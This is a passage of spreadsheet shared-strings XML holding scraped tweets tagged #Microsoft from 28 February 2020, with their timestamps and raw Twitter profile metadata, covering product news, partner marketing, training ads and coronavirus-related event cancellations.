'https://pbs.twimg.com/profile_images/1201466373198798849/bhuZccLS_normal.png',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</si>
  <si>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10:27:39 +0000 2020</t>
  </si>
  <si>
    <t>We are really excited to share with you the story of HR Solutions and risual!
From battling with their old CRM to welcoming Dynamics 365... It has been wonderful to support HR Solutions on their transformation journey.
https://t.co/HhJnfxJblP
#HRSolutions #Microsoft #Technology https://t.co/bin9qDbNmj</t>
  </si>
  <si>
    <t>Fri Feb 28 10:26:59 +0000 2020</t>
  </si>
  <si>
    <t>Delivering on the promise of security AI to help defenders protect todays hybrid environments - The Official Microsoft Blog https://t.co/q3LKcQqwO3 #microsoft</t>
  </si>
  <si>
    <t>{'id': 16003671, 'id_str': '16003671', 'name': 'Dwayne Smurdon', 'screen_name': 'PredictableData', 'location': 'Austin, Tx', 'description': 'We autocorrect and autocomplete inconsistent and missing information for entire databases.', 'url': 'https://t.co/oRK46aDcpF', 'entities': {'url': {'urls': [{'url': 'https://t.co/oRK46aDcpF', 'expanded_url': 'http://www.predictabledata.com', 'display_url': 'predictabledata.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1141, 'friends_count': 88, 'listed_count': 428, 'created_at': 'Tue Aug 26 22:13:52 +0000 2008', 'favourites_count': 13, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 25917,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'http://pbs.twimg.com/profile_images/1371539601/Dwayne-Medium_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1371539601/Dwayne-Medium_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/16003671/1465806434',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</si>
  <si>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10:21:57 +0000 2020</t>
  </si>
  <si>
    <t>What is better Multiple #flows or 1 single flow? #Multiples https://t.co/Kirjmkfccq #Microsoft #Office #Office365</t>
  </si>
  <si>
    <t>Fri Feb 28 10:20:18 +0000 2020</t>
  </si>
  <si>
    <t>#Announcing New #StorageOptions for #AzureCloud Shell https://t.co/JvUo2dbhqV #Microsoft #Office #Office365</t>
  </si>
  <si>
    <t>Fri Feb 28 10:15:11 +0000 2020</t>
  </si>
  <si>
    <t>We are Excel Spreadsheet and Access Database specialists, offering Microsoft Training in the Midlands.
Our training will save you time and money - guaranteed! 
https://t.co/e0nAzN7HZK
#Training #Microsoft #Birmingham #BrumHour https://t.co/uNjtIVq15C</t>
  </si>
  <si>
    <t>{'id': 435149840, 'id_str': '435149840', 'name': 'Les Gutteridge', 'screen_name': 'lesg101', 'location': 'Birmingham, UK', 'description': '#Database, #Spreadsheet &amp; #Microsoft #Office Training Specialist in #Birmingham. Saving you time &amp; money #LesIsMore!', 'url': 'https://t.co/3DEqOHOLD8', 'entities': {'url': {'urls': [{'url': 'https://t.co/3DEqOHOLD8', 'expanded_url': 'http://www.101systemworks.co.uk', 'display_url': '101systemworks.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1379, 'friends_count': 2073, 'listed_count': 11, 'created_at': 'Mon Dec 12 18:44:05 +0000 2011', 'favourites_count': 2337, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2855,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'http://pbs.twimg.com/profile_images/539395380119478273/FqgxPwCX_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/539395380119478273/FqgxPwCX_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/435149840/1417436685',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</si>
  <si>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10:13:44 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Game Stack has announced that due to concerns over #COVID2019 , it will be dropping out of the 2020 GDC. 
After a review of global health authorities, weve withdraw from participating at Game Developers Conference in San Francisco #lotof #Microsoft #coronavirusus https://t.co/XKhrDIU6hj</t>
  </si>
  <si>
    <t>Fri Feb 28 10:12:00 +0000 2020</t>
  </si>
  <si>
    <t>Elevate your skills &amp;amp; increase your productivity with specialised training. #Exedin #Microsoft #FridayFeeling https://t.co/JPibvDtpZl</t>
  </si>
  <si>
    <t>Fri Feb 28 10:10:55 +0000 2020</t>
  </si>
  <si>
    <t>Hyper-V: Configure Time Synchronization for a virtual Domain Controller
https://t.co/mEW78RSNAA
#Microsoft #HyperV #WindowsServer #VM #TimeSynchronization #PowerShell #blogpost #MC2MC https://t.co/bLrQYeubkT</t>
  </si>
  <si>
    <t>Fri Feb 28 10:10:41 +0000 2020</t>
  </si>
  <si>
    <t>Part of the HSE in Ireland, UHL has been piloting online consultaions using #Microsoft #Teams for patients with Cystic Fibrosis. 
The value #technology can bring to the Health Care sector is incredible, watch to learn about a more sustainable health system https://t.co/sbFNjQQVPV</t>
  </si>
  <si>
    <t>Fri Feb 28 10:08:34 +0000 2020</t>
  </si>
  <si>
    <t>Learn about the latest Poly solutions &amp;amp; how they integrate seamlessly with Microsoft Teams.
Book a space at the Poly Power End to End Roadshow at #Microsoft Arabia, #Riyadh, #Saudiarabia ! 
REGISTER HERE ! https://t.co/6EivEk5dPI
@PolyCompanyEMEA  @PolyCompany @Brian_Phillips7 https://t.co/UAzCfXxuVN</t>
  </si>
  <si>
    <t>{'id': 131497434, 'id_str': '131497434', 'name': 'Poly | Microsoft | Al Zubair | Roomz', 'screen_name': 'Alzubairgroup', 'location': 'United Arab Emirates', 'description': 'Al Zubair Group distributes Plantronics, Polycom, Roomz and Microsoft Products in UAE, Saudi Arabia #Poly #plantronics #polycompany #microsoft #Roomz', 'url': 'https://t.co/LTLHHeRhwD', 'entities': {'url': {'urls': [{'url': 'https://t.co/LTLHHeRhwD', 'expanded_url': 'http://www.alzubairgroup.com', 'display_url': 'alzubairgroup.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 65, 'friends_count': 69, 'listed_count': 1, 'created_at': 'Sat Apr 10 13:01:33 +0000 2010', 'favourites_count': 39, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 146,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'http://pbs.twimg.com/profile_images/1217047873751175168/iRS3Pgkr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1217047873751175168/iRS3Pgkr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/131497434/1582392726',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</si>
  <si>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10:08:16 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft, #Facebook to cancel significant events in the coming days due to #coronavirus outbreak. READ: #https://www.indiaaheadnews.com/tech-auto/microsoft-facebook-cancels-significant-events-due-to-the-coronavirus-outbreak-349110</t>
  </si>
  <si>
    <t>Fri Feb 28 10:05:03 +0000 2020</t>
  </si>
  <si>
    <t>100 %OFF 
Learn Microsoft Flow #microsoft #flow
https://t.co/YHf1y6AqX1</t>
  </si>
  <si>
    <t>Fri Feb 28 10:02:39 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft binary blobs in "Linux" news https://t.co/Niz52kbAzM this #marekting strategy for #proprietarySoftware is working...</t>
  </si>
  <si>
    <t>Fri Feb 28 10:02:35 +0000 2020</t>
  </si>
  <si>
    <t>Bitscape offers professional Microsoft Azure consulting services to create flexible &amp;amp;amp; manageable cloud platform. #Microsoft #Azure #Cloud #Consulting #Service 
Talk to our expert today: 844-294-5383
https://t.co/olhUWSf5UG https://t.co/N9IpT9e3oh</t>
  </si>
  <si>
    <t>{'id': 220953858, 'id_str': '220953858', 'name': 'Bitscape', 'screen_name': 'bitscapeinfo', 'location': 'Santa Fe Springs, CA', 'description': 'Bitscape is a Microsoft Gold Competency partner and multiyear Microsoft Worldwide Award recipient. Bitscape focuses on helping customer do more.', 'url': 'https://t.co/5IVIBlLQZT', 'entities': {'url': {'urls': [{'url': 'https://t.co/5IVIBlLQZT', 'expanded_url': 'http://www.bitscape.com', 'display_url': 'bitscape.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 304, 'friends_count': 319, 'listed_count': 153, 'created_at': 'Mon Nov 29 09:54:48 +0000 2010', 'favourites_count': 606, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5644,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'http://pbs.twimg.com/profile_images/735711545510887424/3X0Ur2Qd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/735711545510887424/3X0Ur2Qd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/220953858/1578498064', 'profile_link_color': '0084B4', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'E6F6F9', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 10:01:17 +0000 2020</t>
  </si>
  <si>
    <t>Organisations need to understand that security is an ongoing journey, and you need to engage all employees to ensure it stays successful.
Discover how to create a successful security culture with our recent blog post for #Microsoft 
https://t.co/3yZ5yL7qPc https://t.co/gq81EKGaUI</t>
  </si>
  <si>
    <t>Fri Feb 28 10:01:15 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Windows Modules Installer #Service Information Disclosure https://t.co/BekGDu4xBD #PacketStorm via @SecurityNewsbot</t>
  </si>
  <si>
    <t>{'id': 149109780, 'id_str': '149109780', 'name': 'Cyber Security Daily News', 'screen_name': 'CyberSecDN', 'location': '', 'description': 'Tweeting about #CyberSecurity, #CyberDefense, #DevSecOps, #DFIR, #Forensics, #IncidentResponse, #Privacy, #Pentesting, and sharing daily #InfoSec news.', 'url': 'https://t.co/xkxH2NDlA2', 'entities': {'url': {'urls': [{'url': 'https://t.co/xkxH2NDlA2', 'expanded_url': 'https://www.patreon.com/CyberSecDN', 'display_url': 'patreon.com/CyberSecDN', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5622, 'friends_count': 144, 'listed_count': 951, 'created_at': 'Fri May 28 12:51:15 +0000 2010', 'favourites_count': 786, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 121647,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'http://pbs.twimg.com/profile_images/808492768372748292/rXVdyLWJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/808492768372748292/rXVdyLWJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/149109780/1453963796',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</si>
  <si>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10:00:32 +0000 2020</t>
  </si>
  <si>
    <t>Know the signsis outdated accounting software putting your business at risk? Download the free Business Owner's Guide to Replacing Accounting Software.   #Microsoft #Technology #IT #BusinessAutomation #accounting #MSDyn365 https://t.co/7zBUKFZdZ1</t>
  </si>
  <si>
    <t>Fri Feb 28 09:59:18 +0000 2020</t>
  </si>
  <si>
    <t>IAMCP Ahmedabad Chapter Meeting is finally here.
IAMCP Ahmedabad Chapter Lead Namrata Gupta giving IAMCP Introduction to partners.
#iamcp #iamcpindia #microsoft #MSPartner https://t.co/2piYYohDBW</t>
  </si>
  <si>
    <t>Fri Feb 28 09:58:54 +0000 2020</t>
  </si>
  <si>
    <t>MCSA, MCSD, MCSE certifications retire (or will be retired), shift to role-based certification (the portfolio holds 34 different certifications so far) #Microsoft #Learning https://t.co/2poJw4GItl</t>
  </si>
  <si>
    <t>{'id': 776456816146452480, 'id_str': '776456816146452480', 'name': 'grozdanovd', 'screen_name': 'grozdanovd', 'location': '', 'description': 'Just another net donkey, semi-retired clubber, techie person', 'url': 'https://t.co/dH1aibqwYp', 'entities': {'url': {'urls': [{'url': 'https://t.co/dH1aibqwYp', 'expanded_url': 'https://grozdanovd.blogspot.com', 'display_url': 'grozdanovd.blogspot.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 172, 'friends_count': 249, 'listed_count': 6, 'created_at': 'Thu Sep 15 16:25:05 +0000 2016', 'favourites_count': 14234, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1451, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/778513998094356480/r2R8u8Jg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/778513998094356480/r2R8u8Jg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/776456816146452480/1473963129',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</si>
  <si>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09:58:03 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is bringing its Defender #antivirus software to iOS and Android.
#DefenderATP #Malware #Phishing
https://t.co/8GT0N0243a https://t.co/nDooZsOKoF</t>
  </si>
  <si>
    <t>Fri Feb 28 09:56:56 +0000 2020</t>
  </si>
  <si>
    <t>x #scienxedeluxe # @XEMIDE
#sacher #wien #siemens #azure #fluoroscope #neurosurgery #ai #iot #benz #amg #microsoft
Even a Kid can do it?
https://t.co/qnMJcTgtJS
https://t.co/MzrjyNqrCm https://t.co/3J3Csn7KzC</t>
  </si>
  <si>
    <t>{'id': 4640883377, 'id_str': '4640883377', 'name': '@âŽ³Âµx', 'screen_name': 'NEWAMERICAN_IX', 'location': 'Gandia, EspaÃ±a', 'description': 'https://t.co/sNCCDqjUaV #sciencedeluxe I+N+A Closing the gap between Mind &amp; Time. Adapting Science To Our Lifestyle. #xcupware', 'url': 'https://t.co/hzwIr1wF8w', 'entities': {'url': {'urls': [{'url': 'https://t.co/hzwIr1wF8w', 'expanded_url': 'https://twitter.com/jiwitmanuel', 'display_url': 'twitter.com/jiwitmanuel', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/sNCCDqjUaV', 'expanded_url': 'https://www.linkedin.com/company/xcupware', 'display_url': 'linkedin.com/company/xcupwaâ€¦', 'indices': [0, 23]}]}}, 'protected': False, 'followers_count': 1620, 'friends_count': 1420, 'listed_count': 142, 'created_at': 'Tue Dec 29 07:48:16 +0000 2015', 'favourites_count': 7538, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 14949, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1219010108816084992/gPxyIR7A_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1219010108816084992/gPxyIR7A_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4640883377/1565865098',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</si>
  <si>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09:53:27 +0000 2020</t>
  </si>
  <si>
    <t>We would like to announce that Law 365 has won the @SME__News #LegalAward as Best IT Law Firm - South East England  https://t.co/UV8kgekp37
#LegalService #LegalAdvice #CommercialLaw #BusinessLaw #Microsoft #MSPartners https://t.co/80VGZkAj12</t>
  </si>
  <si>
    <t>Fri Feb 28 09:52:54 +0000 2020</t>
  </si>
  <si>
    <t>What are the #Microsoft Certified Expert Certifications?
 #architect #certification #exam #M365 #MCSE #Azure #AzureFamily
https://t.co/pLGPjdvMBO</t>
  </si>
  <si>
    <t>Fri Feb 28 09:51:58 +0000 2020</t>
  </si>
  <si>
    <t>x #scienxedeluxe # @XEMIDE
#sacher #wien #siemens #azure #fluoroscope #neurosurgery #ai #iot #benz #amg #microsoft
Even a Kid can do it?
https://t.co/qnMJcTgtJS https://t.co/mJg3sTStE8</t>
  </si>
  <si>
    <t>Fri Feb 28 09:50:00 +0000 2020</t>
  </si>
  <si>
    <t>Improve your #ManufacturingProcess with #SAPB1 - https://t.co/JzyfEDuZ6Q
#SAPBusinessOne #SME #CEO #BusinessManagement #Enterprise #Denmark #SAPBusinessbyDesign #SAPPartner #DigitalTransformation #Embrace #Microsoft #SAPERP #Manufacturing  #Engineering #SupplyChain  #manufacturer https://t.co/gyw188hXfG</t>
  </si>
  <si>
    <t>{'id': 787634788995780609, 'id_str': '787634788995780609', 'name': 'Stridely Solutions', 'screen_name': 'stridelysol', 'location': 'Ahmadabad City, India', 'description': '#SAP Implementation and Support #MSDynamics365 #MicrosoftSolutions #Businessintelligence #PowerPlatform #EmergingTechnologies #InternetofThings #IoT', 'url': 'https://t.co/yVS0ZcgvfU', 'entities': {'url': {'urls': [{'url': 'https://t.co/yVS0ZcgvfU', 'expanded_url': 'http://www.stridelysolutions.com/', 'display_url': 'stridelysolutions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 52, 'friends_count': 78, 'listed_count': 2, 'created_at': 'Sun Oct 16 12:42:22 +0000 2016', 'favourites_count': 61, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 634,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'http://pbs.twimg.com/profile_images/787635909546041344/iBjLfN99_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/787635909546041344/iBjLfN99_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/787634788995780609/1576589616',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</si>
  <si>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#Microsoft Warning Is A Harbinger Of #Coronavirus Impact On #Business And The #Economy https://t.co/5us40bvUcX  via @forbes</t>
  </si>
  <si>
    <t>Fri Feb 28 09:48:03 +0000 2020</t>
  </si>
  <si>
    <t>SwiftKey Keyboard for Android receives dark mode and a redesigned Setting page #SwiftKey #Microsoft https://t.co/Y0cTH4U6Wa https://t.co/bJHARpM5Oe</t>
  </si>
  <si>
    <t>Fri Feb 28 09:47:52 +0000 2020</t>
  </si>
  <si>
    <t>$MSFT #Microsoft https://t.co/t3WCKlUtFA</t>
  </si>
  <si>
    <t>{'id': 764167502993784832, 'id_str': '764167502993784832', 'name': 'Endoryan', 'screen_name': 'The_Endoryan', 'location': 'Endor', 'description': 'likes trading, hodling and rockÂ´n roll', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2250, 'friends_count': 255, 'listed_count': 62, 'created_at': 'Fri Aug 12 18:31:45 +0000 2016', 'favourites_count': 11284, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2262,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'http://pbs.twimg.com/profile_images/764173314373844993/0IrDBF3F_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/764173314373844993/0IrDBF3F_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/764167502993784832/1551881753',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</si>
  <si>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09:47:16 +0000 2020</t>
  </si>
  <si>
    <t>Next up is Casandra Marrero, Modern Comms Product Marketing Manager for #Microsoft with a live demo of #Teams. 
#CoreLovesTeams https://t.co/8jIZzhJBz6</t>
  </si>
  <si>
    <t>Fri Feb 28 09:47:11 +0000 2020</t>
  </si>
  <si>
    <t>FREE EVENT: Codeless AI Apps in Microsoft Office 365 Powerapps
In collaboration with @CloudstreetC @ntpowerplatform 
RSVP https://t.co/ufw1yx6g9y  
https://t.co/Cm3x8FdkI9 
#powerbi #microsoft #powerapps #dashboard #businessintelligence #data #dataanalytics  #microsoftpowerbi https://t.co/IaPNX23Gpa</t>
  </si>
  <si>
    <t>Fri Feb 28 09:46:24 +0000 2020</t>
  </si>
  <si>
    <t>ZDNet | #Microsoft's new update should address some complaints by... #MicrosoftWindows https://t.co/7AxGYO1aDT https://t.co/JWPlt4A5KM</t>
  </si>
  <si>
    <t>Fri Feb 28 09:45:09 +0000 2020</t>
  </si>
  <si>
    <t>It was fascinating seeing the closing keynote with Nick Wallace, Commercial Director at @Azure at #Oracle #OpenWorld #London.  He was discussing the compatibility with various software's. 
#OOWLON #Microsoft #migration #Azure #ERP #OracleContractors https://t.co/tbBEFwAYfX</t>
  </si>
  <si>
    <t>Signature of the Rome Call for Ethics with #Vatican #Microsoft #IBM #FAO #EuropeanParliament and #ItalianGovernment #empowerEU #Ai #4IR #renAIssance @JuliaGlidden @BradSmi @CarolAnnBrowne https://t.co/BdAvrtzImV</t>
  </si>
  <si>
    <t>{'id': 536144709, 'id_str': '536144709', 'name': 'Rita Tenan', 'screen_name': 'RitaTenan', 'location': 'Rome, Italy - London, UK', 'description': 'Government Industry Director @MicrosoftEMEA: mom, wife, woman in leadership, citizen of the world.. a passion for  digital transformation &amp; people!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1279, 'friends_count': 1309, 'listed_count': 91, 'created_at': 'Sun Mar 25 06:41:52 +0000 2012', 'favourites_count': 2715, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2179,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'http://pbs.twimg.com/profile_images/1954774188/DSCN1929_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1954774188/DSCN1929_normal.jpg',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</si>
  <si>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09:45:04 +0000 2020</t>
  </si>
  <si>
    <t>risual engaged with an IT department within a global pharmaceuticals company that wanted to improve their communication and collaboration.
https://t.co/JgRevfHmUk 
#communication #collaboration #data #microsoft #technology https://t.co/2nhb2jrzxT</t>
  </si>
  <si>
    <t>Fri Feb 28 09:42:56 +0000 2020</t>
  </si>
  <si>
    <t>$MSFT Will Microsoft (MSFT, $164.20) miss its guidance due to Cornavirus crisis?. #Microsoft #stockmarket #stock #money #trading #investing #daytrading #news #today Read more: https://t.co/6XQCstdaH3 https://t.co/FePxJ7enpv</t>
  </si>
  <si>
    <t>Fri Feb 28 09:35:42 +0000 2020</t>
  </si>
  <si>
    <t>Learn #Microsoft #Excel #Online and Boosts Your #Career
I know this man named Harry, who has a corporate #job. He has a lot of uses for spreadsheets or to be specific #MS Excel.#one_education
Click here: https://t.co/UImytgexzL https://t.co/HNFsdUgAns</t>
  </si>
  <si>
    <t>{'id': 994945804233142272, 'id_str': '994945804233142272', 'name': 'One Education', 'screen_name': 'OneEducationUK', 'location': "100 St Paul's Churchyard, London, EC4M 8BU", 'description': 'One Education is to help people gain the practical knowledge and transferable skills necessary to enhance their career.', 'url': 'https://t.co/t4zFL4xb8O', 'entities': {'url': {'urls': [{'url': 'https://t.co/t4zFL4xb8O', 'expanded_url': 'https://www.oneeducation.org.uk', 'display_url': 'oneeducation.org.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 128, 'friends_count': 154, 'listed_count': 0, 'created_at': 'Fri May 11 14:22:19 +0000 2018', 'favourites_count': 55, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 480,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'http://pbs.twimg.com/profile_images/996363812079943680/qv1pZRwt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/996363812079943680/qv1pZRwt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/994945804233142272/1526386673',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</si>
  <si>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09:32:40 +0000 2020</t>
  </si>
  <si>
    <t>US #markets saw the worst slump week since 2008 with #DowJones plunging 1.11% while #Nasdaq dipped by 1.35%. And sinking deeper into negative territory, #Apple was down 3.30%% and also #Microsoft fell into red. Among the few top stocks on #WallStreet stands out #Pfizer (+2,22%) https://t.co/PtvLWYqECt</t>
  </si>
  <si>
    <t>{'id': 1022046043796631553, 'id_str': '1022046043796631553', 'name': 'MarketWall.com', 'screen_name': 'Marketwall_Com', 'location': 'Milan, Lombardy', 'description': 'News and videos on global stock market. Real time quotes and charts on indexes, stocks and currencies. \nDiscover MarketWall, a new financial markets experience.', 'url': 'https://t.co/LLqPHsWSsb', 'entities': {'url': {'urls': [{'url': 'https://t.co/LLqPHsWSsb', 'expanded_url': 'https://www.marketwall.com/?lang=en', 'display_url': 'marketwall.com/?lang=en', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2129, 'friends_count': 212, 'listed_count': 6, 'created_at': 'Wed Jul 25 09:09:00 +0000 2018', 'favourites_count': 56, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1049, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1208060642135085058/d1GQKnwO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1208060642135085058/d1GQKnwO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1022046043796631553/1578391620',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</si>
  <si>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09:31:53 +0000 2020</t>
  </si>
  <si>
    <t>My article about Windows Subsystem for Linux has been re-released in @adminmagazine issue #54 and is available for free: https://t.co/dGBfC1D8V3 #Microsoft #Windows #WSL #Linux #X410 #X11 #opensource</t>
  </si>
  <si>
    <t>{'id': 66627024, 'id_str': '66627024', 'name': 'Dr. Christian Knermann', 'screen_name': 'cknermann', 'location': 'NRW, Germany', 'description': 'Works with and writes about computing technology | Ducati motorcycle enthusiast | Photographer | Traveller', 'url': 'https://t.co/ToKbCIykaQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/ToKbCIykaQ', 'expanded_url': 'http://www.knermann.de', 'display_url': 'knermann.de', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 160, 'friends_count': 135, 'listed_count': 29, 'created_at': 'Tue Aug 18 07:53:25 +0000 2009', 'favourites_count': 232, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 89, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'EDECE9', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1007326024458231808/gcErBx5q_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1007326024458231808/gcErBx5q_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/66627024/1400442369', 'profile_link_color': 'D20000', 'profile_sidebar_border_color': 'D3D2CF', 'profile_sidebar_fill_color': 'E3E2DE', 'profile_text_color': '555555', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 09:31:49 +0000 2020</t>
  </si>
  <si>
    <t>We're very proud of our amazing team at Perfect Image, keep up the great work everyone! Find out more about hosting your Microsoft workloads on AWS: https://t.co/IkmzWeCaDY
#AWSConsultingPartner #AWSPartner #AWS #Cloud #CloudConsulting #CloudSolutions #Microsoft https://t.co/kUzUI38Wvf</t>
  </si>
  <si>
    <t>Fri Feb 28 09:30:25 +0000 2020</t>
  </si>
  <si>
    <t>This week a few Reefers from Chester and Kingston made their way to the lovely beaches of #Bournemouth for a team meet up. 
We think the Chester team might have been a little jealous of the sunshine during the morning beach walk ;)
#remoteagency #remoteteam #microsoft https://t.co/iC7g1h4lwh</t>
  </si>
  <si>
    <t>Fri Feb 28 09:30:00 +0000 2020</t>
  </si>
  <si>
    <t>The first episode in Microsoft's new series around #quantum computing and the impact it's having today. #Microsoft # Edgecomputing #AI #healthcare #climatechange https://t.co/jAhiGFoiYw</t>
  </si>
  <si>
    <t>Fri Feb 28 09:28:47 +0000 2020</t>
  </si>
  <si>
    <t>Power BI Desktop For Windows
#microsoftpowerbi #businessintelligencebi #microsoft #businessintelligence #PowerBI 
https://t.co/AtoEp8npJt https://t.co/iypK0QvDHD</t>
  </si>
  <si>
    <t>Fri Feb 28 09:25:55 +0000 2020</t>
  </si>
  <si>
    <t>#examdumps #MB200  #Microsoft #dumps #Microsoftdumps
You can easily attempt your Microsoft MB-200 exam in your single attempt by using Certs Test Engine PDF dumps within one week.
Visit: https://t.co/FRVRjwx4wY https://t.co/zmGm9bJ1hw</t>
  </si>
  <si>
    <t>{'id': 1169307157285617664, 'id_str': '1169307157285617664', 'name': 'CertsTestEngine', 'screen_name': 'certstestengine', 'location': 'United State', 'description': 'We are providing original and extraordinary exam braindumps VCE.', 'url': 'https://t.co/xv8rVyBzeg', 'entities': {'url': {'urls': [{'url': 'https://t.co/xv8rVyBzeg', 'expanded_url': 'http://certstestengine.com', 'display_url': 'certstestengine.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Wed Sep 04 17:52:47 +0000 2019',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'http://pbs.twimg.com/profile_images/1217828650055323648/vqzyXV82_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1217828650055323648/vqzyXV82_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1169307157285617664/1582881165',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</si>
  <si>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09:25:38 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is Out with the Perfect #Xbox Specifications : Heres a look at... https://t.co/GlkBdXHQKN @Yourtechstory</t>
  </si>
  <si>
    <t>{'id': 173920041, 'id_str': '173920041', 'name': 'Your Tech Story', 'screen_name': 'yourtechstory', 'location': '', 'description': 'Stories behind products, entrepreneurs, teams and culture ....', 'url': 'http://t.co/6xzMCbs9hY', 'entities': {'url': {'urls': [{'url': 'http://t.co/6xzMCbs9hY', 'expanded_url': 'http://www.yourtechstory.com', 'display_url': 'yourtechstory.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 102, 'friends_count': 336, 'listed_count': 8, 'created_at': 'Mon Aug 02 17:51:44 +0000 2010', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 955,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'http://pbs.twimg.com/profile_images/687531536929787904/WRSLmy6K_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/687531536929787904/WRSLmy6K_normal.png',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</si>
  <si>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09:25:24 +0000 2020</t>
  </si>
  <si>
